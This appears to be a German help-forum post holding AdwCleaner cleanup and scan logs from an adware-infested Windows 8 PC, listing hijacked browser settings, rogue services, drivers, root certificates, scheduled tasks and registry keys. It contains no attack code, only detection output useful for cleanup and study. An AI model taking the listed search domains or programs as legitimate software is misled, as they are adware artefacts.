[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.options.tabEnabled", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.productDeliveryOption.language", "en");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.productDeliveryOption.type", "Toolbar");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.successUrl", "hxxp://www.yessearches.com/chrome.php?uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&ts=AHEpB38oBXYsBE..&v=20160121&mode=ffexttoolbar&[...]
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.toolbarCollapsed", false);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark._brMembers_.uninstallTasks", "{\"prefBranchesToDelete\":[\"extensions.toolbar.mindspark._brMembers_.\"],\"filesToDelete\":[\"C:\\\\Users\\\\Manz\\\\AppData\\\\R[...]
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark.hp.enabled", true);
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark.hp.enabled.guid", "yourGSearchfinder@GSearch.com");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("extensions.toolbar.mindspark.lastInstalled", "yourGSearchfinder@GSearch.com");
[-] [C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gelöscht : user_pref("keyword.URL", "hxxp://www.yessearches.com/chrome.php?uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&ts=AHEpB38oBXYsBE..&v=20160121&mode=ffexttoolbar&q=");
[-] [C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Web Data] [Search Provider] Gelöscht : palikan
[-] [C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Secure Preferences] [Extension] Gelöscht : booedmolknjekdopkepjjeckmjkdpfgl
[-] [C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Secure Preferences] [Extension] Gelöscht : flpcjncodpafbgdpnkljologafpionhb
[-] [C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Secure Preferences] [Extension] Gelöscht : jlcgehabolcakkjhgmgpkagpolbjlhfa

*************************

:: "Tracing" Schlüssel gelöscht
:: Proxy Einstellungen zurückgesetzt
:: Winsock Einstellungen zurückgesetzt
:: Chrome Richtlinien gelöscht

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [41535 Bytes] ##########

AdwCleaner S1

Code:

ATTFilter

# AdwCleaner v5.032 - Bericht erstellt am 07/02/2016 um 22:27:38
# Aktualisiert am 31/01/2016 von Xplode
# Datenbank : 2016-02-07.2 [Server]
# Betriebssystem : Windows 8  (x64)
# Benutzername : Manz - HAUS
# Gestartet von : E:\AdwCleaner_5.032.exe
# Option : Suchlauf
# Unterstützung : hxxp://toolslib.net/forum

***** [ Dienste ] *****

Dienst Gefunden : cherimoya
Dienst Gefunden : ClaraUpdater
Dienst Gefunden : SSFK
Dienst Gefunden : DnsBlockUpdateSvc
Dienst Gefunden : MPCProtectService
Dienst Gefunden : WdMan
Dienst Gefunden : MPCKpt
Dienst Gefunden : nekydufizbt
Dienst Gefunden : qigypevozbt
Dienst Gefunden : wucotusy
Dienst Gefunden : zutuzuni

***** [ Ordner ] *****

Ordner Gefunden : C:\Program Files\SOUND+
Ordner Gefunden : C:\Program Files\{05EB6F99-463B-44CA-93A7-7C57786E2569}
Ordner Gefunden : C:\Program Files\{BBA6D671-3BA2-4BBC-9A9A-4C748AD4901E}
Ordner Gefunden : C:\Program Files\{BC760D76-4920-48C3-A3DD-6689681D1D92}
Ordner Gefunden : C:\Program Files\shopperz010220161759
Ordner Gefunden : C:\Program Files (x86)\MPC Cleaner
Ordner Gefunden : C:\Program Files (x86)\Professional Cleaning Software
Ordner Gefunden : C:\Program Files (x86)\QuickSearch
Ordner Gefunden : C:\Program Files (x86)\SecurityUtility
Ordner Gefunden : C:\Program Files (x86)\SFK
Ordner Gefunden : C:\Program Files (x86)\SearchesToYesbnd
Ordner Gefunden : C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275
Ordner Gefunden : C:\Program Files (x86)\B5B53C54-1454247040-E111-8F5D-B888E3A0B275
Ordner Gefunden : C:\Program Files (x86)\B5B53C54-1454872248-E111-8F5D-B888E3A0B275
Ordner Gefunden : C:\Program Files (x86)\Super Great
Ordner Gefunden : C:\Program Files (x86)\{6E5909E8-3B98-4878-BF84-218A47B5BDBE}
Ordner Gefunden : C:\Program Files (x86)\{81124F8F-D6AB-4912-9F8D-54DC4E6DDE56}
Ordner Gefunden : C:\Program Files (x86)\{FC83B1F4-FC2A-4AED-BF32-D1F007D9AB1D}
Ordner Gefunden : C:\Program Files (x86)\rec_en_77
Ordner Gefunden : C:\Program Files (x86)\SpaceSondPro_v53.12571
Ordner Gefunden : C:\Program Files (x86)\Common Files\ClaraUpdater
Ordner Gefunden : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC
Ordner Gefunden : C:\Users\Manz\AppData\Local\BoBrowser
Ordner Gefunden : C:\Users\Manz\AppData\Local\BrowserAir
Ordner Gefunden : C:\Users\Manz\AppData\Local\DnsBlock
Ordner Gefunden : C:\Users\Manz\AppData\Local\ext_funfeedr
Ordner Gefunden : C:\Users\Manz\AppData\Local\Professional_Cleaning_Sof
Ordner Gefunden : C:\Users\Manz\AppData\Local\B5B53C54-1454249191-E111-8F5D-B888E3A0B275
Ordner Gefunden : C:\Users\Manz\AppData\Local\B5B53C54-1454273619-E111-8F5D-B888E3A0B275
Ordner Gefunden : C:\Users\Manz\AppData\Local\B5B53C54-1454875958-E111-8F5D-B888E3A0B275
Ordner Gefunden : C:\Users\Manz\AppData\Local\B5B53C54-1454881735-E111-8F5D-B888E3A0B275
Ordner Gefunden : C:\Users\Manz\AppData\Local\Temp\APN-Stub
Ordner Gefunden : C:\Users\Manz\AppData\Local\Temp\MPC
Ordner Gefunden : C:\Users\Manz\AppData\Local\Temp\Super Great
Ordner Gefunden : C:\Users\Manz\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\ASPackage
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\Genius
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\istartpageing
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\PriceFountain
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\Systweak
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ASPackage
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BrowserAir
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Professional Cleaning Software
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\deskCutv2@gmail.com
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\yahooprotected@gmail.com
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\Extensions\deskCutv2@gmail.com
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\Extensions\yahooprotected@gmail.com
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\Extensions\deskCutv2@gmail.com
Ordner Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\Extensions\yahooprotected@gmail.com
Ordner Gefunden : C:\Users\Manz\Documents\ProfessionalCleaningSoftware
Ordner Gefunden : C:\WINDOWS\Installer\{15BE6350-F697-486F-9D42-AEB6331C3B6D}
Ordner Gefunden : C:\WINDOWS\Installer\{386CE530-7A1F-4930-B6A0-12C686CC9468}
Ordner Gefunden : C:\WINDOWS\Installer\{40E468DE-4F96-445E-98FD-B843B650E95B}
Ordner Gefunden : C:\WINDOWS\Installer\{509E29BD-7FB8-4358-843B-6873FB59B15D}
Ordner Gefunden : C:\WINDOWS\SysNative\Tasks\Genius

***** [ Dateien ] *****

Datei Gefunden : C:\END
Datei Gefunden : C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
Datei Gefunden : C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Local Storage\hxxp_www.palikan.com_0.localstorage
Datei Gefunden : C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Local Storage\hxxp_www.palikan.com_0.localstorage-journal
Datei Gefunden : C:\Users\Manz\AppData\Local\Temp\lengine.ini.log
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\BrowserAir.lnk
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\BoBrowser.lnk
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\BrowserAir.lnk
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\user.js
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\istartpageing.xml
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\yoursearching.xml
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\user.js
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\smod.xml
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\istartpageing.xml
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\yoursearching.xml
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\user.js
Datei Gefunden : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\searchplugins\istartpageing.xml
Datei Gefunden : C:\Users\Manz\Desktop\Facebook.lnk
Datei Gefunden : C:\Users\Manz\Desktop\Youtube.lnk
Datei Gefunden : C:\Users\Manz\Desktop\BrowserAir.lnk
Datei Gefunden : C:\Users\Manz\Desktop\Sound+.lnk
Datei Gefunden : C:\Users\Public\Desktop\MPC Cleaner.lnk
Datei Gefunden : C:\WINDOWS\SysNative\roboot64.exe
Datei Gefunden : C:\WINDOWS\SysNative\DnsBlockUpdateSvc.exe
Datei Gefunden : C:\WINDOWS\SysNative\dns.block
Datei Gefunden : C:\WINDOWS\SysNative\GroupPolicy\Machine\Registry.pol
Datei Gefunden : C:\WINDOWS\SysNative\GroupPolicy\GPT.ini
Datei Gefunden : C:\WINDOWS\SysNative\drivers\cherimoya.sys
Datei Gefunden : C:\WINDOWS\SysNative\drivers\MPCKpt.sys
Datei Gefunden : C:\WINDOWS\SysNative\drivers\sdfhgdf.sys
Datei Gefunden : C:\WINDOWS\SysWOW64\dns.block
Datei Gefunden : C:\WINDOWS\SysWOW64\lavasofttcpservice.dll
Datei Gefunden : C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini

***** [ DLL ] *****

Datei Infiziert : C:\WINDOWS\SysNative\dnsapi.dll
Datei Infiziert : C:\WINDOWS\SysWOW64\dnsapi.dll

***** [ Verknüpfungen ] *****


***** [ Aufgabenplanung ] *****

Geplante Aufgabe Gefunden : Run_Bobby_Browser
Geplante Aufgabe Gefunden : Go_Palikan
Geplante Aufgabe Gefunden : crash_service
Geplante Aufgabe Gefunden : runTask
Geplante Aufgabe Gefunden : updateTask
Geplante Aufgabe Gefunden : IBUpd
Geplante Aufgabe Gefunden : Genius
Geplante Aufgabe Gefunden : Genius_Interval
Geplante Aufgabe Gefunden : ProfessionalCleaningSoftware_Popup
Geplante Aufgabe Gefunden : ProfessionalCleaningSoftware_Start
Geplante Aufgabe Gefunden : IBUpd2
Geplante Aufgabe Gefunden : Security Utility Updater
Geplante Aufgabe Gefunden : Security Utility Updater

***** [ Registrierungsdatenbank ] *****

Schlüssel Gefunden : HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\bobrowser.exe
Schlüssel Gefunden : HKCU\Software\Mozilla\Extends
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\AppID\DPBHO.DLL
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\MediaPlayer\ShimInclusionList\bobrowser.exe
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\MediaPlayer\ShimInclusionList\BrowserAir.exe
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\A7BD54B233B5B2F70AF86F5BD1A0C0A772A59FC6
Schlüssel Gefunden : HKLM\SOFTWARE\MICROSOFT\SystemCertificates\Root\Certificates\D830B6B8939ACB4928401060203BB648456BB4F8
Schlüssel Gefunden : HKLM\SOFTWARE\MICROSOFT\SystemCertificates\Root\Certificates\F53E693DDABF57A88A9B12B608B09B26C0608B74
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ProfessionalCleaningSoftware.exe
Schlüssel Gefunden : HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E
Wert Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [gmsd_de_005010223]
Wert Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [rec_en_77]
Wert Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [rec_de_184]
Wert Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [gmsd_de_005010228]
Wert Gefunden : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [deskCutv2@gmail.com]
Wert Gefunden : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [yahooprotected@gmail.com]
Wert Gefunden : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [{C3CD68D2-6088-4E72-BDE2-DE30DFFF4239}]
Wert Gefunden : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [{63D7461E-C5DF-4012-87F0-A52D95FE9EC3}]
Schlüssel Gefunden : HKCU\Software\Google\Chrome\Extensions\jlcgehabolcakkjhgmgpkagpolbjlhfa
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\AppID\{425F4ABF-B8E4-402D-9E49-06E494EB8DBF}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\AppID\{1C6F51F8-BCE6-4702-8952-6A8233359FBC}
Schlüssel Gefunden : HKCU\Software\Classes\CLSID\{17EF1FFB-0545-4C9A-BE64-78FF53338475}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\CLSID\{C424171E-592A-415A-9EB1-DFD6D95D3530}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\CLSID\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\CLSID\{7D8DAE88-BC05-4578-8C29-E541FFBA5757}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\CLSID\{11B16A3D-F03E-4565-A532-E66B219C9B0E}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\CLSID\{11B16A3D-F03E-4565-A532-E66B219C9B03}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\CLSID\{8FF10FED-2F0A-4F7F-BE87-B04F1DCD4319}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\CLSID\{7D8DAE88-BC05-4578-8C29-E541FFBA5757}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\Interface\{F2DB3739-77FB-41EB-9ED3-ABF34DF2DBF7}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\Interface\{296E49AA-76AE-4392-8145-A06733310DF1}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\Interface\{7307C0C7-347E-48DD-BF91-F8E74D3FE764}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\TypeLib\{E7BF74EE-9106-4113-B216-2F980BA29141}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\TypeLib\{14EF423E-3EE8-44AE-9337-07AC3F27B744}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\TypeLib\{14EF423E-3EE8-44AE-9337-07AC3F27B744}
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\TypeLib\{CC5E6338-EB1B-4E46-8271-E691F9096452}
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11B16A3D-F03E-4565-A532-E66B219C9B03}
Schlüssel Gefunden : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C424171E-592A-415A-9EB1-DFD6D95D3530}
Schlüssel Gefunden : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
Schlüssel Gefunden : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{11B16A3D-F03E-4565-A532-E66B219C9B03}
Schlüssel Gefunden : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{C424171E-592A-415A-9EB1-DFD6D95D3530}
Schlüssel Gefunden : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
Schlüssel Gefunden : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{11B16A3D-F03E-4565-A532-E66B219C9B03}
Wert Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}]
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C424171E-592A-415A-9EB1-DFD6D95D3530}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Classes\CLSID\{C424171E-592A-415A-9EB1-DFD6D95D3530}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Classes\CLSID\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Classes\Interface\{F2DB3739-77FB-41EB-9ED3-ABF34DF2DBF7}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Classes\Interface\{296E49AA-76AE-4392-8145-A06733310DF1}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Classes\Interface\{7307C0C7-347E-48DD-BF91-F8E74D3FE764}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C424171E-592A-415A-9EB1-DFD6D95D3530}
Schlüssel Gefunden : HKCU\Software\BrowserAir
Schlüssel Gefunden : HKCU\Software\DAILYPCCLEAN
Schlüssel Gefunden : HKCU\Software\DownloadProtect
Schlüssel Gefunden : HKCU\Software\FFUPD
Schlüssel Gefunden : HKCU\Software\FunFeedr
Schlüssel Gefunden : HKCU\Software\ICSW1.17
Schlüssel Gefunden : HKCU\Software\Microsoft\Tinstalls
Schlüssel Gefunden : HKCU\Software\Mozilla\Extends
Schlüssel Gefunden : HKCU\Software\Palikan
Schlüssel Gefunden : HKCU\Software\PRODUCTSETUP
Schlüssel Gefunden : HKCU\Software\Professional Cleaning Software
Schlüssel Gefunden : HKCU\Software\ProfessionalCleaningSoftwareLanguage
Schlüssel Gefunden : HKCU\Software\Reg\Clean
Schlüssel Gefunden : HKCU\Software\SpaceSoundPro
Schlüssel Gefunden : HKCU\Software\tstamptoken
Schlüssel Gefunden : HKCU\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
Schlüssel Gefunden : HKCU\Software\AppDataLow\Sams.Browser
Schlüssel Gefunden : HKLM\SOFTWARE\Clara
Schlüssel Gefunden : HKLM\SOFTWARE\FFPluginHp
Schlüssel Gefunden : HKLM\SOFTWARE\istartpageingSoftware
Schlüssel Gefunden : HKLM\SOFTWARE\MPC
Schlüssel Gefunden : HKLM\SOFTWARE\Professional Cleaning Software
Schlüssel Gefunden : HKLM\SOFTWARE\QuickSearch
Schlüssel Gefunden : HKLM\SOFTWARE\Reg\Clean
Schlüssel Gefunden : HKLM\SOFTWARE\SpaceSondPro
Schlüssel Gefunden : HKLM\SOFTWARE\Tutorials
Schlüssel Gefunden : HKLM\SOFTWARE\WdsManPro
Schlüssel Gefunden : HKLM\SOFTWARE\yessearchesSoftware
Schlüssel Gefunden : HKLM\SOFTWARE\yoursearchingSoftware
Schlüssel Gefunden : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\BrowserAir
Schlüssel Gefunden : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Security utility
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ASPackage
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPC
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Professional Cleaning Software
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SU
Schlüssel Gefunden : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\BrowserAir
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\BubbleSound
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\SearchModule
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\SOUNDPLUS
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\SpaceSoundPro
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Speedchecker Limited
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E1527582-8509-4011-B922-29E3FB548882}_is1
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SOUNDPLUS
Schlüssel Gefunden : HKU\.DEFAULT\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
Schlüssel Gefunden : HKU\S-1-5-19\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
Schlüssel Gefunden : HKU\S-1-5-20\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\BrowserAir
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\DAILYPCCLEAN
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\DownloadProtect
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\FFUPD
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\FunFeedr
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\ICSW1.17
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Tinstalls
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Mozilla\Extends
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Palikan
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\PRODUCTSETUP
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Professional Cleaning Software
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\ProfessionalCleaningSoftwareLanguage
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Reg\Clean
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\SpaceSoundPro
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\tstamptoken
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\AppDataLow\Sams.Browser
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Windows\CurrentVersion\Uninstall\BrowserAir
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Windows\CurrentVersion\Uninstall\Security utility
Schlüssel Gefunden : HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-2229505580-413648313-3343944023-1002\Software\DownloadProtect
Schlüssel Gefunden : HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-2229505580-413648313-3343944023-1002\Software\shopperz010220161759
Schlüssel Gefunden : HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-2229505580-413648313-3343944023-1002\Software\{5B8E7A09-20B5-4534-82B9-7284AA3DED94}
Schlüssel Gefunden : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{015DB5FA-EAFB-4592-A95B-F44D3EE87FA9}
Schlüssel Gefunden : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{140E657E-89B5-411B-951A-24698B1E79EF}
Daten Gefunden : HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] - {140E657E-89B5-411B-951A-24698B1E79EF}
Schlüssel Gefunden : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{31E15B1A-A8DD-4EE8-B691-0B5EF63443F3}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{140E657E-89B5-411B-951A-24698B1E79EF}
Schlüssel Gefunden : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\SearchScopes\{015DB5FA-EAFB-4592-A95B-F44D3EE87FA9}
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\SearchScopes\{140E657E-89B5-411B-951A-24698B1E79EF}
